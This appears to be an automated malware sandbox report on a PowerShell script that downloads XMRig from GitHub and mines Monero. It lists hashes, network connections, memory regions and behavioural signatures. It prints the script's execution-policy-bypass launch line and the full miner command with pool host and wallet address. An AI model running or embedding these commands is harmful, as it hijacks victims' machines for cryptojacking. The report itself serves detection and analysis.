N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.43:443 tcp

Files

memory/2824-0-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qd0wjw2a.0fw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2824-9-0x00000232732C0000-0x00000232732E2000-memory.dmp

memory/2824-10-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2824-11-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2824-12-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2824-14-0x00000232735D0000-0x00000232735E2000-memory.dmp

memory/2824-15-0x00000232735B0000-0x00000232735BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2064-46-0x0000013107FC0000-0x0000013107FE0000-memory.dmp

memory/2064-47-0x0000013108010000-0x0000013108030000-memory.dmp

memory/2064-48-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-49-0x0000013108030000-0x0000013108050000-memory.dmp

memory/2064-50-0x0000013108050000-0x0000013108070000-memory.dmp

memory/2824-52-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

memory/2064-51-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2824-53-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2064-54-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-55-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-57-0x0000013108050000-0x0000013108070000-memory.dmp

memory/2064-56-0x0000013108030000-0x0000013108050000-memory.dmp

memory/2064-58-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-59-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-60-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-61-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-62-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-63-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-64-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-65-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-66-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-67-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-68-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-69-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-70-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-71-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-72-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-73-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-74-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-75-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-76-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-77-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-78-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-79-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-80-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-81-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-82-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-83-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-84-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-85-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-86-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-87-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-88-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-89-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-90-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-91-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-92-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-93-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-94-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-95-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-96-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-97-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-98-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-99-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-100-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-101-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-102-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-103-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-104-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-105-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-106-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-107-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-108-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-109-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-110-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-111-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-112-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-113-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-114-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-115-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

memory/2064-116-0x00007FF751DF0000-0x00007FF752A23000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:34

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.21:443 tcp

Files

memory/3392-0-0x00007FF863373000-0x00007FF863375000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a03ecizu.1h2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3392-9-0x0000014B72EB0000-0x0000014B72ED2000-memory.dmp

memory/3392-10-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/3392-11-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/3392-12-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/3392-14-0x0000014B73290000-0x0000014B732A2000-memory.dmp

memory/3392-15-0x0000014B73280000-0x0000014B7328A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4628-46-0x00000217BB0C0000-0x00000217BB0E0000-memory.dmp

memory/4628-47-0x00000217BB110000-0x00000217BB130000-memory.dmp

memory/4628-48-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/3392-50-0x00007FF863373000-0x00007FF863375000-memory.dmp

memory/4628-53-0x00000217BCA10000-0x00000217BCA30000-memory.dmp

memory/4628-52-0x00000217BB130000-0x00000217BB150000-memory.dmp

memory/3392-51-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/4628-49-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/3392-54-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/4628-55-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-56-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-58-0x00000217BCA10000-0x00000217BCA30000-memory.dmp

memory/4628-57-0x00000217BB130000-0x00000217BB150000-memory.dmp

memory/4628-59-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-60-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-61-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-62-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-63-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-64-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-65-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-66-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-67-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-68-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-69-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-70-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-71-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-72-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-73-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-74-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-75-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-76-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-77-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-78-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-79-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-80-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-81-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-82-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-83-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-84-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-85-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-86-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-87-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-88-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-89-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-90-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-91-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-92-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-93-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-94-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-95-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-96-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-97-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-98-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-99-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-100-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-101-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-102-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-103-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-104-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-105-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-106-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-107-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-108-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-109-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-110-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-111-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-112-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-113-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-114-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-115-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-116-0x00007FF656900000-0x00007FF657533000-memory.dmp

memory/4628-117-0x00007FF656900000-0x00007FF657533000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:20

Platform

win7-20240221-en

Max time kernel

1562s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Network

N/A

Files

memory/2196-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

memory/2196-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2196-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2196-6-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/2196-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2196-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2196-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2196-11-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2196-12-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:21

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/1744-0-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/1744-5-0x0000021241390000-0x00000212413B2000-memory.dmp

memory/1744-8-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-9-0x0000021259A40000-0x0000021259AB6000-memory.dmp

memory/1744-10-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cj05rmj.tlq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1744-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-48-0x0000021241570000-0x0000021241582000-memory.dmp

memory/1744-61-0x00000212413F0000-0x00000212413FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2032-90-0x000002121FA60000-0x000002121FA80000-memory.dmp

memory/1744-91-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/1744-92-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/2032-93-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/1744-94-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/2032-95-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-96-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-97-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-98-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-99-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-100-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-101-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-102-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-103-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-104-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-105-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-106-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-107-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-108-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-109-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-110-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-111-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-112-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-113-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-114-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-115-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-116-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-117-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-118-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-119-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-120-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-121-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-122-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-123-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-124-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-125-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-126-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-127-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-128-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-129-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-130-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-131-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-132-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-133-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

